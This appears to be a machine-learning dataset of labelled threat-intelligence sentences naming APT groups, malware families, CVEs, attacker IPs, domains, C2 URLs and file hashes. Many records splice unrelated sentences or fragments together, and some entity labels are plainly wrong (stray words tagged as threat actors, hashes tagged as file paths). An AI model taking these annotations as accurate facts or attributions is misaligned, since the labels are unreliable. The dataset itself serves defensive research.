{"text": "It can also access the phone ’ s cameras and microphone . More recently Turla was accused of breaching RUAG , a Swiss technology company , in a public report published by GovCERT.ch . Researchers have pointed out that it is not uncommon for China-based threat groups to target Hong Kong media organizations , particularly ones whose reporting focuses on the pro-democracy movement .", "spans": {"THREAT_ACTOR: Turla": [[72, 77]], "ORGANIZATION: RUAG": [[103, 107]], "ORGANIZATION: GovCERT.ch": [[171, 181]], "THREAT_ACTOR: threat groups": [[253, 266]], "ORGANIZATION: media organizations": [[287, 306]]}, "info": {"id": "cyberner_stix_train_004326", "source": "cyberner_stix_train"}}
{"text": "Suckfly 's first step was to identify a user to target so the attackers could attempt their initial breach into the e-commerce company 's internal network .", "spans": {"THREAT_ACTOR: Suckfly": [[0, 7]]}, "info": {"id": "cyberner_stix_train_004327", "source": "cyberner_stix_train"}}
{"text": "Based on information gained from discussion with the initial TRITON S-MAL/TRISIS responders and subsequent work on follow-on activity by this entity , Dragos developed a comprehensive ( public ) picture of adversary activity roughly matching FireEye ’s analysis published in April 2019 , described in various media .", "spans": {"MALWARE: TRITON S-MAL/TRISIS": [[61, 80]], "ORGANIZATION: Dragos": [[151, 157]], "ORGANIZATION: FireEye": [[242, 249]]}, "info": {"id": "cyberner_stix_train_004328", "source": "cyberner_stix_train"}}
{"text": "As visible on following chart , the lifespan of many well-known rented Android bankers is usually no more than one or two years . Operators behind Machete apparently already have information about individuals or organizations of interest to them in Latin America , how to reach them , and how best to trick them into getting compromised . APT38 .", "spans": {"SYSTEM: Android": [[71, 78]], "THREAT_ACTOR: Machete": [[147, 154]], "THREAT_ACTOR: APT38": [[339, 344]]}, "info": {"id": "cyberner_stix_train_004329", "source": "cyberner_stix_train"}}
{"text": "After all , a working product is often more important than a stable product . The activity dates to at least 2013 and has ties to multiple reports by other researchers . Public disclosures may result in an immediate change in APT12 ’s tools . The new campaign , which we call FakeSG , also relies on hacked WordPress websites to display a custom landing page mimicking the victim 's browser .", "spans": {"THREAT_ACTOR: APT12": [[226, 231]]}, "info": {"id": "cyberner_stix_train_004330", "source": "cyberner_stix_train"}}
{"text": "The attackers deploy the Shamoon malware .", "spans": {"MALWARE: Shamoon": [[25, 32]]}, "info": {"id": "cyberner_stix_train_004331", "source": "cyberner_stix_train"}}
{"text": "The conditions to build an additional payload are never met . In this campaign , Gaza Cybergang used disposable emails and domains as the phishing platform to target the victims . Initial technical information about this feature was shared by the Thyssenkrupp CERT in the form of an Nmap script that could be used to identify Winnti infections through network scanning .", "spans": {"THREAT_ACTOR: Gaza Cybergang": [[81, 95]], "ORGANIZATION: Thyssenkrupp CERT": [[247, 264]], "TOOL: Nmap": [[283, 287]], "MALWARE: Winnti": [[326, 332]]}, "info": {"id": "cyberner_stix_train_004332", "source": "cyberner_stix_train"}}
{"text": "We have worked with Google and they ensure that Google Play Protect proactively catches apps of this nature . Lazarus was initially known for its involvement in espionage operations and a number of high-profile disruptive attacks , including the 2014 attack on Sony Pictures that saw large amounts of information being stolen and computers wiped by malware . In April 2019 , reports emerged of an intrusion involving Winnti malware at a GermanPharmaceutical company .", "spans": {"ORGANIZATION: Google": [[20, 26]], "SYSTEM: Google Play Protect": [[48, 67]], "THREAT_ACTOR: Lazarus": [[110, 117]], "MALWARE: Winnti": [[417, 423]], "ORGANIZATION: GermanPharmaceutical": [[437, 457]]}, "info": {"id": "cyberner_stix_train_004333", "source": "cyberner_stix_train"}}
{"text": "Of note , this methodology of naming abstracts away the “ who ” element – XENOTIME may represent a single discrete entity ( such as a Russian research institution ) or several entities working in coordination in a roughly repeatable , similar manner across multiple events .", "spans": {"THREAT_ACTOR: XENOTIME": [[74, 82]]}, "info": {"id": "cyberner_stix_train_004334", "source": "cyberner_stix_train"}}
{"text": "Many of the targets we identified were well known commercial organizations located in India .", "spans": {}, "info": {"id": "cyberner_stix_train_004335", "source": "cyberner_stix_train"}}
{"text": "] it Catanzaro server2fi.exodus.connexxa [ . CNIIHM 's characteristics are consistent with what we might expect of an organization responsible for TEMP.Veles activity . Requesting commands from the C2 server : They have used phishing emails containing inline links to malicious URLs hosting DOUBLEDRAG malware , a highly obfuscated Javascript downloader .", "spans": {"THREAT_ACTOR: CNIIHM": [[45, 51]], "THREAT_ACTOR: TEMP.Veles": [[147, 157]], "TOOL: C2": [[198, 200]], "THREAT_ACTOR: used phishing emails containing inline links to malicious URLs hosting": [[220, 290]], "MALWARE: DOUBLEDRAG malware": [[291, 309]]}, "info": {"id": "cyberner_stix_train_004336", "source": "cyberner_stix_train"}}
{"text": "Check Point analyzed Yingmob ’ s Umeng account to gain further insights into the HummingBad campaign and found that beyond the 10 million devices under the control of malicious apps , Yingmob has non-malicious apps installed on another 75 million or so devices . Trend Micro endpoint solutions such as Trend Micro™ Smart Protection Suites and Worry-Free™ Business Security can protect users and businesses from these threats by detecting malicious files and spammed messages as well as blocking all related malicious URLs . APT33 : 64.251.19.214 [REDACTED].ddns.net . The Monti ransomware collective has restarted their operations , focusing on institutions in the legal and governmental fields .", "spans": {"ORGANIZATION: Check Point": [[0, 11]], "ORGANIZATION: Yingmob": [[21, 28], [184, 191]], "MALWARE: HummingBad": [[81, 91]], "ORGANIZATION: Trend Micro": [[263, 274]], "ORGANIZATION: Trend Micro™ Smart Protection Suites": [[302, 338]], "ORGANIZATION: Worry-Free™ Business Security": [[343, 372]], "ORGANIZATION: businesses": [[395, 405]], "MALWARE: malicious files": [[438, 453]], "THREAT_ACTOR: APT33": [[524, 529]], "IP_ADDRESS: 64.251.19.214": [[532, 545]], "DOMAIN: [REDACTED].ddns.net": [[546, 565]], "THREAT_ACTOR: Monti ransomware collective": [[572, 599]], "ORGANIZATION: legal and governmental fields": [[665, 694]]}, "info": {"id": "cyberner_stix_train_004337", "source": "cyberner_stix_train"}}
{"text": "Infection vector and victims While looking for the infection vector , we found no evidence of spear phishing or any of the other common vectors . When victims open malicious documents attached to the emails , the malware scans for Bitcoin activity and then establishes an implant for long-term data-gathering . This script in turn downloaded and executed a PowerShell backdoor known as POSHC2 , a proxy-aware C&C framework , from the C&C server ( https:// host-manager.hopto.org ) . But after being informed that Bradshaw was not subject to Canadian trademark laws , Avid Life offered to buy AshleyMadisonSucks.com for $ 10,000 .", "spans": {"MALWARE: PowerShell backdoor": [[357, 376]], "MALWARE: POSHC2": [[386, 392]], "TOOL: proxy-aware C&C framework": [[397, 422]], "URL: https:// host-manager.hopto.org": [[447, 478]], "ORGANIZATION: Bradshaw": [[513, 521]], "ORGANIZATION: Avid Life": [[567, 576]], "ORGANIZATION: AshleyMadisonSucks.com": [[592, 614]]}, "info": {"id": "cyberner_stix_train_004338", "source": "cyberner_stix_train"}}
{"text": "SpyNote RAT captured the device ’ s screen activities along with audio using the MediaProjectionCallback functionality ( available with Lollipop , the Android 5.0 release , and later ) and saved the output in a file named \" video.mp4 '' as shown in the following screenshot SMS stealing SpyNote RAT was also observed stealing SMS messages from the affected devices , as shown in screenshot below : Stealing contacts The ability to steal contacts is a favorite feature for spyware developers , as the stolen contacts can be used to further spread the spyware Group-IB specialists have established that the aim of the attack was to deliver and launch the second stage of Silence’s Trojan , known as Silence.MainModule . The basic principles of targeted attacks on financial institutions have not changed since 2013 when the Anunak , Corkow , Buhtrap , and Lurk groups began conducting the first attacks on Russian banks .", "spans": {"MALWARE: SpyNote RAT": [[0, 11], [287, 298]], "SYSTEM: Lollipop": [[136, 144]], "SYSTEM: Android 5.0": [[151, 162]], "ORGANIZATION: Group-IB": [[558, 566]], "THREAT_ACTOR: Silence’s": [[669, 678]], "ORGANIZATION: financial institutions": [[762, 784]], "THREAT_ACTOR: Anunak": [[822, 828]], "MALWARE: Corkow": [[831, 837]], "THREAT_ACTOR: Buhtrap": [[840, 847]], "THREAT_ACTOR: Lurk groups": [[854, 865]], "ORGANIZATION: banks": [[912, 917]]}, "info": {"id": "cyberner_stix_train_004339", "source": "cyberner_stix_train"}}
{"text": "These encoded strings contain the new URL addresses not seen in older versions of FakeSpy . At the end of 2018 , while searching for new FIN7 campaigns via telemetry , we discovered a set of activity that we temporarily called CopyPaste” from a previously unknown APT . In May 2017 , NCC Group 's Incident Response team reacted to an ongoing incident .", "spans": {"MALWARE: FakeSpy": [[82, 89]], "THREAT_ACTOR: FIN7": [[137, 141]], "ORGANIZATION: NCC Group 's Incident Response": [[284, 314]]}, "info": {"id": "cyberner_stix_train_004340", "source": "cyberner_stix_train"}}
{"text": "The capabilities remained unchanged , but a new endpoint was added to the Trojan C2 allowing it to handle the generic card grabber overlay and specific target overlays ( banking apps ) separately . On the two other victim networks , the attackers deployed a unique version of the UPPERCUT (ANEL) backdoor , known to have only been used by APT10 . The group focuses on companies that have intellectual property or sensitive information like those in the Defense and High-Tech industries .", "spans": {"TOOL: UPPERCUT": [[280, 288]], "THREAT_ACTOR: APT10": [[339, 344]], "ORGANIZATION: Defense and High-Tech": [[453, 474]]}, "info": {"id": "cyberner_stix_train_004341", "source": "cyberner_stix_train"}}
{"text": "The main difference is that Smaps transmits data as plain text , while Asacub encrypts data with the RC4 algorithm and then encodes it into base64 format . CTU researchers have observed the threat group obtaining information about specific U.S. defense projects that would be desirable to those operating within a country with a manufacturing base , an interest in U.S. military capability , or both . The kit we found is in tgz format , though we have observed some samples disguised as png or jpg . Tools for phishing analysis and remediation that save security operations teams time and help find indicators of compromise across a sea of suspicious messages can also make a big difference in the fight against ransomware .", "spans": {"MALWARE: Smaps": [[28, 33]], "MALWARE: Asacub": [[71, 77]], "ORGANIZATION: CTU": [[156, 159]], "ORGANIZATION: U.S. defense": [[240, 252]], "ORGANIZATION: military capability": [[370, 389]]}, "info": {"id": "cyberner_stix_train_004342", "source": "cyberner_stix_train"}}
{"text": "We have collected numerous samples spanning from 2016 to early 2019 . The use of infrastructure tied to Iranian operations , timing and alignment with the national interests of Iran also lead FireEye to assess that APT34 acts on behalf of the Iranian government . The RAT starts by launching three threads . Methods of manipulating control can include changes to set point values , tags , or other parameters .", "spans": {"ORGANIZATION: FireEye": [[192, 199]], "THREAT_ACTOR: APT34": [[215, 220]], "TOOL: RAT": [[268, 271]]}, "info": {"id": "cyberner_stix_train_004343", "source": "cyberner_stix_train"}}
{"text": "TG-3390 : 208.115.242.37 .", "spans": {"THREAT_ACTOR: TG-3390": [[0, 7]], "IP_ADDRESS: 208.115.242.37": [[10, 24]]}, "info": {"id": "cyberner_stix_train_004344", "source": "cyberner_stix_train"}}
{"text": "COSMICDUKE : First known activity January 2010 , Most recent known activity Summer 2015 , Other names Tinybaron , BotgenStudios , NemesisGemina , C&C communication methods HTTP(S) , FTP , WebDav , Known toolset components Information stealer , Multiple loaders , Privilege escalation component , Multiple persistence components .", "spans": {"MALWARE: COSMICDUKE": [[0, 10]], "MALWARE: Tinybaron": [[102, 111]], "MALWARE: BotgenStudios": [[114, 127]], "MALWARE: NemesisGemina": [[130, 143]], "TOOL: C&C": [[146, 149]], "TOOL: Information stealer": [[222, 241]], "TOOL: loaders": [[253, 260]]}, "info": {"id": "cyberner_stix_train_004345", "source": "cyberner_stix_train"}}
{"text": "] com was a C2 for Poison Ivy samples associated with attacks on Myanmar and other Asian countries discussed in a blog published by Arbor Networks in April 2016 . The limited use of these tools by APT41 suggests the group reserves more advanced TTPs and malware only for high-value targets . APT32 often deploys these backdoors along with the commercially-available Cobalt Strike BEACON backdoor .", "spans": {"MALWARE: Poison Ivy": [[19, 29]], "ORGANIZATION: Arbor Networks": [[132, 146]], "THREAT_ACTOR: APT41": [[197, 202]], "THREAT_ACTOR: APT32": [[292, 297]], "MALWARE: Cobalt Strike BEACON backdoor": [[366, 395]]}, "info": {"id": "cyberner_stix_train_004346", "source": "cyberner_stix_train"}}
{"text": "This APT group usually carries out target attacks against government agencies to steal sensitive information . TG-3390 SWCs may be largely geographically independent , but the group 's most frequently used C2 registrars and IP net blocks are located in the U.S .", "spans": {"ORGANIZATION: government agencies": [[58, 77]], "THREAT_ACTOR: TG-3390": [[111, 118]], "TOOL: C2": [[206, 208]]}, "info": {"id": "cyberner_stix_train_004347", "source": "cyberner_stix_train"}}
{"text": "Moreover , we retrieved his University ID ; a quick googling showed some of his exam grades . The malware was initially distributed through a compromised software update system and then self-propagated through stolen credentials and SMB exploits , including the EternalBlue exploit used in the WannaCry attack from May 2017 . jams481.site.bz .", "spans": {"MALWARE: malware": [[98, 105]], "TOOL: EternalBlue exploit": [[262, 281]], "THREAT_ACTOR: WannaCry": [[294, 302]], "DOMAIN: jams481.site.bz": [[326, 341]]}, "info": {"id": "cyberner_stix_train_004348", "source": "cyberner_stix_train"}}
{"text": "For most of the OnionDuke components we observed , the first versions that we are aware of were compiled during the summer of 2013 , suggesting that this was a period of active development around this toolset .", "spans": {"MALWARE: OnionDuke": [[16, 25]]}, "info": {"id": "cyberner_stix_train_004349", "source": "cyberner_stix_train"}}
{"text": "In 2018 , Kaspersky Labs published a report that analyzed Turla threat group . To control ATMs , the group uses the Atmosphere Trojan , which is unique to Silence , or a program called xfs-disp.exe . In addition , Silence downloads the reverse proxy programs Silence.ProxyBot and SilenceProxyBot.NET , which are described in detail in the report Silence: moving into the darkside .", "spans": {"ORGANIZATION: Kaspersky": [[10, 19]], "THREAT_ACTOR: Turla": [[58, 63]], "MALWARE: Atmosphere Trojan": [[116, 133]], "THREAT_ACTOR: Silence": [[155, 162], [214, 221]], "MALWARE: xfs-disp.exe": [[185, 197]], "MALWARE: Silence.ProxyBot": [[259, 275]], "MALWARE: SilenceProxyBot.NET": [[280, 299]]}, "info": {"id": "cyberner_stix_train_004350", "source": "cyberner_stix_train"}}
{"text": "CVE-2016-0034 : Microsoft Silverlight 5.1.41212.0 Vulnerability .", "spans": {"VULNERABILITY: CVE-2016-0034": [[0, 13]], "TOOL: Microsoft Silverlight": [[16, 37]]}, "info": {"id": "cyberner_stix_train_004351", "source": "cyberner_stix_train"}}
{"text": "The NGOs targeted by BRONZE PRESIDENT conduct research on issues relevant to the PRC .", "spans": {"ORGANIZATION: NGOs": [[4, 8]], "THREAT_ACTOR: BRONZE PRESIDENT": [[21, 37]], "ORGANIZATION: PRC": [[81, 84]]}, "info": {"id": "cyberner_stix_train_004352", "source": "cyberner_stix_train"}}
{"text": "In case of both the documents ( Uri Terror Report.doc and mha-report.doc ) the malicious macro code was heavily obfuscated (used obscure variable/function names to make analysis harder ) and did not contain any auto execute functions .", "spans": {"FILEPATH: Uri Terror Report.doc": [[32, 53]], "FILEPATH: mha-report.doc": [[58, 72]], "TOOL: macro code": [[89, 99]]}, "info": {"id": "cyberner_stix_train_004354", "source": "cyberner_stix_train"}}
{"text": "In addition to the clicking activity , Judy displays a large amount of advertisements , which in some cases leave users with no option but clicking on the ad itself . Public disclosure by third-parties , including the DHS , associate ALLANITE operations with Russian strategic interests . The code waits for an incoming connection . Module ID Internal Name 1 module_ipc 2 module_monitor 3 module_apu 4 module_event 5 module_net", "spans": {"MALWARE: Judy": [[39, 43]], "ORGANIZATION: DHS": [[218, 221]]}, "info": {"id": "cyberner_stix_train_004355", "source": "cyberner_stix_train"}}
{"text": "The malware basically provides a remote CMD/PowerShell terminal for the attackers , enabling them to execute scripts/commands and receive the results via HTTP requests . Mimikatz is a post-exploitation tool that allows attackers to extract credentials from volatile memory .", "spans": {"MALWARE: malware": [[4, 11]], "TOOL: CMD/PowerShell": [[40, 54]], "THREAT_ACTOR: attackers": [[72, 81]], "FILEPATH: Mimikatz": [[170, 178]]}, "info": {"id": "cyberner_stix_train_004356", "source": "cyberner_stix_train"}}
{"text": "Even though the Dukes appear to have targeted governments all over the world , we are unaware of them ever targeting the Russian government .", "spans": {"THREAT_ACTOR: Dukes": [[16, 21]]}, "info": {"id": "cyberner_stix_train_004357", "source": "cyberner_stix_train"}}
{"text": "Deutsche Post - Deutsche Post DHL Group , a German multinational package delivery and supply chain management company headquartered in Bonn . Insikt Group enumerated all domains reported as being used by APT33 since January 2019 . Technical analysis on some of the attacks as well as attribution links with Pakistan actors have been already depicted by 360 and Tuisec , in which they found interesting connections to a larger group of attackers Unit 42 researchers have been tracking , which we are calling Gorgon Group .", "spans": {"ORGANIZATION: Deutsche Post": [[0, 13]], "ORGANIZATION: DHL Group": [[30, 39]], "ORGANIZATION: Insikt": [[142, 148]], "THREAT_ACTOR: APT33": [[204, 209]], "THREAT_ACTOR: actors": [[316, 322]], "ORGANIZATION: 360": [[353, 356]], "ORGANIZATION: Tuisec": [[361, 367]], "THREAT_ACTOR: attackers": [[435, 444]], "ORGANIZATION: Unit 42": [[445, 452]], "THREAT_ACTOR: Gorgon Group": [[507, 519]]}, "info": {"id": "cyberner_stix_train_004358", "source": "cyberner_stix_train"}}
{"text": "The official “ Golden Cup ” Facebook page . From 2016 through 2017 , two subsidiaries of U.S. and Philippine consumer products corporations , located inside Vietnam , were the target of APT32 intrusion operations . Carbon Black was able to discover approximately 120 different Ursnif variants that were being hosted from the domains iscondisth.com and bevendbrec.com . irongreen.exe : 404d25e3a18bda19a238f77270837198 c064f6f047a4e39014a29c8c95526c3fe90d7bcea5ef0b8f21ea306c27713d1f , Sun Dec 18 11:04:31 2011 UTC . irongreen.text : 85aa9117c381eae3d181ab63daab335e . irongreen.rdata : 3e1c774bc4e0ffc2271075e621aa3f3d . irongreen.data : 6c389e5e301564f65dcad4811dbded8b . irongreen.rsrc : efba623cc62ffd0ccbf7f3fbf6264905 . irongreen.reloc : 6cf46599a57a6cbc5d18fbb2883620ce . The fact that this activity occurred as recently as August 2023 suggests that the group is currently active , and that those organizations that may be of interest to Budworm should be aware of this activity and the groups current toolset .", "spans": {"MALWARE: Golden Cup": [[15, 25]], "SYSTEM: Facebook": [[28, 36]], "ORGANIZATION: consumer products corporations": [[109, 139]], "THREAT_ACTOR: APT32": [[186, 191]], "ORGANIZATION: Carbon Black": [[215, 227]], "MALWARE: Ursnif": [[277, 283]], "DOMAIN: iscondisth.com": [[333, 347]], "DOMAIN: bevendbrec.com": [[352, 366]], "FILEPATH: irongreen.exe": [[369, 382]], "FILEPATH: 404d25e3a18bda19a238f77270837198": [[385, 417]], "FILEPATH: c064f6f047a4e39014a29c8c95526c3fe90d7bcea5ef0b8f21ea306c27713d1f": [[418, 482]], "FILEPATH: irongreen.text": [[516, 530]], "FILEPATH: 85aa9117c381eae3d181ab63daab335e": [[533, 565]], "FILEPATH: irongreen.rdata": [[568, 583]], "FILEPATH: 3e1c774bc4e0ffc2271075e621aa3f3d": [[586, 618]], "FILEPATH: irongreen.data": [[621, 635]], "FILEPATH: 6c389e5e301564f65dcad4811dbded8b": [[638, 670]], "FILEPATH: irongreen.rsrc": [[673, 687]], "FILEPATH: efba623cc62ffd0ccbf7f3fbf6264905": [[690, 722]], "FILEPATH: irongreen.reloc": [[725, 740]], "FILEPATH: 6cf46599a57a6cbc5d18fbb2883620ce": [[743, 775]], "THREAT_ACTOR: the": [[856, 859]], "ORGANIZATION: organizations": [[903, 916]], "THREAT_ACTOR: Budworm": [[944, 951]], "THREAT_ACTOR: groups": [[993, 999]]}, "info": {"id": "cyberner_stix_train_004359", "source": "cyberner_stix_train"}}
{"text": "The finding , in part , shows the risk that can come in opting for less expensive smartphones , whose manufacturers may not diligently fix security vulnerabilities . Rapid7 again observed APT10 dropping payloads named ccSEUPDT.exe The attackers used identical TTPs for executing malware and Mimikatz as observed before , by using DLL sideloading with known good binaries that had DLL search order path issues . Daserf : 04080fbab754dbf0c7529f8bbe661afef9c2cba74e3797428538ed5c243d705a .", "spans": {"VULNERABILITY: security vulnerabilities": [[139, 163]], "ORGANIZATION: Rapid7": [[166, 172]], "THREAT_ACTOR: APT10": [[188, 193]], "MALWARE: ccSEUPDT.exe": [[218, 230]], "TOOL: Mimikatz": [[291, 299]], "MALWARE: Daserf": [[411, 417]], "FILEPATH: 04080fbab754dbf0c7529f8bbe661afef9c2cba74e3797428538ed5c243d705a": [[420, 484]]}, "info": {"id": "cyberner_stix_train_004360", "source": "cyberner_stix_train"}}
{"text": "Captured legitimate user credentials when users interacted with these actor - controlled servers . we detected an ongoing campaign targeting a national data center in the Centeral Asia .", "spans": {"THREAT_ACTOR: actor": [[70, 75]]}, "info": {"id": "cyberner_stix_train_004361", "source": "cyberner_stix_train"}}
{"text": "Further research of the attacker ’ s infrastructure revealed more related mimicking domains . It is likely a new campaign or actor started using Panda Banker since in addition to the previously unseen Japanese targeting , Arbor has not seen any indicator of compromise (IOC) overlaps with previous Panda Banker campaigns . The admin@338 has largely targeted organizations involved in financial , economic and trade policy , typically using publicly available RATs such as Poison Ivy , as well some non-public backdoors .", "spans": {"THREAT_ACTOR: actor": [[125, 130]], "TOOL: Panda Banker": [[145, 157]], "ORGANIZATION: Arbor": [[222, 227]], "MALWARE: Panda Banker": [[298, 310]], "THREAT_ACTOR: admin@338": [[327, 336]], "ORGANIZATION: financial": [[384, 393]], "ORGANIZATION: economic": [[396, 404]], "ORGANIZATION: trade policy": [[409, 421]], "MALWARE: RATs": [[459, 463]], "MALWARE: Poison Ivy": [[472, 482]], "MALWARE: non-public backdoors": [[498, 518]]}, "info": {"id": "cyberner_stix_train_004362", "source": "cyberner_stix_train"}}
{"text": "] net , negg1.ddns [ . We believe the iOS malware gets installed on already compromised systems , and it is very similar to next stage SEDNIT malware we have found for Microsoft Windows’ systems . In August 2015 , the admin@338 sent spear phishing emails to a number of Hong Kong-based media organizations .", "spans": {"ORGANIZATION: We": [[23, 25]], "MALWARE: SEDNIT": [[135, 141]], "THREAT_ACTOR: admin@338": [[218, 227]], "TOOL: emails": [[248, 254]], "ORGANIZATION: media organizations": [[286, 305]]}, "info": {"id": "cyberner_stix_train_004363", "source": "cyberner_stix_train"}}
{"text": "Permissions The package name follows the original style name used on DenDroid . Some of the known filenames for Gray Lambert are mwapi32.dll and poolstr.dll – it should be pointed though that the filenames used by the Lamberts are generally unique and have never been used twice . APT12 . In addition to the complexity of managing CSP rules , this vulnerability shows how widely used services such as Google Analytics can be subverted to bypass this protection .", "spans": {"MALWARE: DenDroid": [[69, 77]], "TOOL: Gray Lambert": [[112, 124]], "TOOL: mwapi32.dll": [[129, 140]], "TOOL: poolstr.dll": [[145, 156]], "TOOL: Lamberts": [[218, 226]], "THREAT_ACTOR: APT12": [[281, 286]], "SYSTEM: Google Analytics": [[401, 417]]}, "info": {"id": "cyberner_stix_train_004364", "source": "cyberner_stix_train"}}
{"text": "Figure 12 : Fake Bank Austria Security application icon In addition to operating as a banking Trojan , overlaying a legitimate banking app with an indistinguishable credential theft page , the malware also asks for credit card information from the user when they open applications such as the Google Play store . The CIA has developed automated multi-platform malware attack and control systems covering Windows , Mac OS X , Solaris , Linux and more , such as EDB's HIVE and the related Cutthroat and Swindle tools , which are described in the examples section below . Deep Panda is a suspected Chinese threat group known to target many industries , including government , defense , financial , and telecommunications .", "spans": {"SYSTEM: Fake Bank Austria Security application": [[12, 50]], "SYSTEM: Google Play": [[293, 304]], "THREAT_ACTOR: CIA": [[317, 320]], "TOOL: Windows": [[404, 411]], "TOOL: Mac OS X": [[414, 422]], "TOOL: Solaris": [[425, 432]], "TOOL: Linux": [[435, 440]], "TOOL: HIVE": [[466, 470]], "TOOL: Cutthroat": [[487, 496]], "TOOL: Swindle": [[501, 508]], "THREAT_ACTOR: Deep Panda": [[569, 579]]}, "info": {"id": "cyberner_stix_train_004365", "source": "cyberner_stix_train"}}
{"text": "He also used his email account to log into various services in the video , which identifies him as the adware domain owner , beyond any doubt . Ploutus-D will load KXCashDispenserLib” library implemented by Kalignite Platform (K3A.Platform.dll) to interact with the XFS Manager and control the Dispenser (see Figure 13) . In this analysis , we observed the return of HIDDEN COBRA 's Bankshot malware implant surfacing in the Turkish financial system .", "spans": {"MALWARE: Ploutus-D": [[144, 153]], "MALWARE: (K3A.Platform.dll)": [[226, 244]], "THREAT_ACTOR: HIDDEN COBRA": [[367, 379]], "MALWARE: Bankshot": [[383, 391]], "MALWARE: malware": [[392, 399]]}, "info": {"id": "cyberner_stix_train_004366", "source": "cyberner_stix_train"}}
{"text": "Historically , the majority of their targeting has been focused on the South Korean government , military , and defense industrial base . Despite being an older vulnerability , many threat actors continue to leverage CVE-2012-0158 to exploit Microsoft Word .", "spans": {"ORGANIZATION: South Korean government": [[71, 94]], "ORGANIZATION: military": [[97, 105]], "ORGANIZATION: defense": [[112, 119]], "VULNERABILITY: CVE-2012-0158": [[217, 230]], "VULNERABILITY: exploit": [[234, 241]], "FILEPATH: Microsoft Word": [[242, 256]]}, "info": {"id": "cyberner_stix_train_004367", "source": "cyberner_stix_train"}}
{"text": "APT41 has targeted payment services specializing in handling in-game transactions and real money transfer (RMT) purchases . Confucius' backdoors are delivered through Office documents exploiting memory corruption vulnerabilities CVE-2015-1641 and CVE-2017-11882 .", "spans": {"THREAT_ACTOR: APT41": [[0, 5]], "ORGANIZATION: payment services": [[19, 35]], "MALWARE: Confucius' backdoors": [[124, 144]], "VULNERABILITY: CVE-2015-1641": [[229, 242]], "VULNERABILITY: CVE-2017-11882": [[247, 261]]}, "info": {"id": "cyberner_stix_train_004368", "source": "cyberner_stix_train"}}
{"text": "In this latest incident , the group registered a fake news domain , timesofindiaa.in , on May 18 , 2016 , and then used it to send spear phishing emails to Indian government officials on the same day . This article is an attempt to share this experience with other experts , particularly the IT security specialists in companies and financial institutions that increasingly find themselves the targets of cyber-attacks .", "spans": {"ORGANIZATION: government officials": [[163, 183]], "ORGANIZATION: IT": [[292, 294]], "ORGANIZATION: financial institutions": [[333, 355]]}, "info": {"id": "cyberner_stix_train_004369", "source": "cyberner_stix_train"}}
{"text": "The C2 backend url looks like this : https : //evilhost/c2folder/njs2/ ? Bookworm 's functional code is radically different from PlugX and has a rather unique modular architecture that warranted additional analysis by Unit 42 . These emails contained malicious Microsoft Word documents with the aforementioned Flash Player zero-day hidden inside an embedded ActiveX object . BADCALL communicates on ports 443 and 8000 with a FakeTLS method.[6 ] Bankshot binds and listens on port 1058 for HTTP traffic while also utilizing a FakeTLS method.[7 ] BendyBear has used a custom RC4 and XOR encrypted protocol over port 443 for C2.[8 ]", "spans": {"TOOL: Bookworm": [[73, 81]], "TOOL: PlugX": [[129, 134]], "ORGANIZATION: Unit 42": [[218, 225]], "TOOL: emails": [[234, 240]], "TOOL: Microsoft Word documents": [[261, 285]], "VULNERABILITY: Flash Player zero-day": [[310, 331]], "TOOL: ActiveX object": [[358, 372]], "MALWARE: BADCALL": [[375, 382]], "MALWARE: Bankshot": [[445, 453]], "MALWARE: BendyBear": [[545, 554]]}, "info": {"id": "cyberner_stix_train_004370", "source": "cyberner_stix_train"}}
{"text": "Threat data from endpoints are combined with signals from email and data , identities , and apps in Microsoft 365 Defender ( previously Microsoft Threat Protection ) , which orchestrates detection , prevention , investigation , and response across domains , providing coordinated defense . Using information from the FireEye DTI cloud , FireEye observed that Ke3chang targeted a single firm . Double Loaded Zip File Delivers Nanocore Most malware sent via emails is packaged in archives such as ZIP, RAR, and 7z ) . How The Command are executed The malware add to the user environment variables and creates a pipe for covert communication and receiving the output .", "spans": {"SYSTEM: Microsoft 365 Defender": [[100, 122]], "SYSTEM: Microsoft Threat Protection": [[136, 163]], "ORGANIZATION: FireEye DTI": [[317, 328]], "ORGANIZATION: FireEye": [[337, 344]], "THREAT_ACTOR: Ke3chang": [[359, 367]], "TOOL: emails": [[456, 462]], "MALWARE: The malware": [[545, 556]]}, "info": {"id": "cyberner_stix_train_004371", "source": "cyberner_stix_train"}}
{"text": "26fef238028ee4b5b8da631c77bfb44ada3d5db8129c45dea5df6a51c9ea5f55 33a9da16d096426c82f150e39fc4f9172677885cfeaedcff10c86414e88be802 34d000ee1e36efd10eb37e2b79d69249d5a85682a61390a89a1b9391c46bf2ba 4f6146956b50ae3a6e80a1c1f771dba848ba677064eb0e166df5804ac2766898 Dragos instead focuses on threat behaviors and appropriate detection and response . URL : http://nicoledotso.icu/debby/weatherford/Vydalyty . They can target a single company , maybe with the intention of stealing trade secrets or discrediting that company .", "spans": {"ORGANIZATION: Dragos": [[260, 266]], "URL: http://nicoledotso.icu/debby/weatherford/Vydalyty": [[350, 399]], "ORGANIZATION: single company": [[420, 434]]}, "info": {"id": "cyberner_stix_train_004372", "source": "cyberner_stix_train"}}
{"text": ") embedded in the executable and prepares the execution of a new layer of VM decoding . DROPSHOT is a notable piece of malware used to deliver variants of the TURNEDUP backdoor . The encoded payload is additionally encrypted with AES128 and further obfuscated with XOR in an attempt to fool steganography detection tools . Once installed , the trojan could disrupt operations within systems and networks or exfiltrate confidential data .", "spans": {"TOOL: DROPSHOT": [[88, 96]], "TOOL: malware": [[119, 126]], "TOOL: XOR": [[265, 268]], "MALWARE: trojan": [[344, 350]]}, "info": {"id": "cyberner_stix_train_004373", "source": "cyberner_stix_train"}}
{"text": "It should be noted that until this point , even though CosmicDuke had been in active use for over 4 years , and had undergone minor modifications and updates during that time , even the most recent CosmicDuke samples would often embed persistence components that date back to 2012 .", "spans": {"MALWARE: CosmicDuke": [[55, 65], [198, 208]]}, "info": {"id": "cyberner_stix_train_004374", "source": "cyberner_stix_train"}}
{"text": "In fact , with full access to the compromised Android smartphone , the opportunities for criminals to wreak havoc are significant – such as erasing infected phones or launching man-in-the-middle ( MITM ) attacks . The group has carried out attacks most months since December 2017 . so the callback can deobfuscate multiple control flow flattenings . Based on available information Mandiant has not been able to assess a general location that the group operates from .", "spans": {"SYSTEM: Android smartphone": [[46, 64]], "THREAT_ACTOR: group": [[218, 223]], "ORGANIZATION: Mandiant": [[381, 389]]}, "info": {"id": "cyberner_stix_train_004375", "source": "cyberner_stix_train"}}
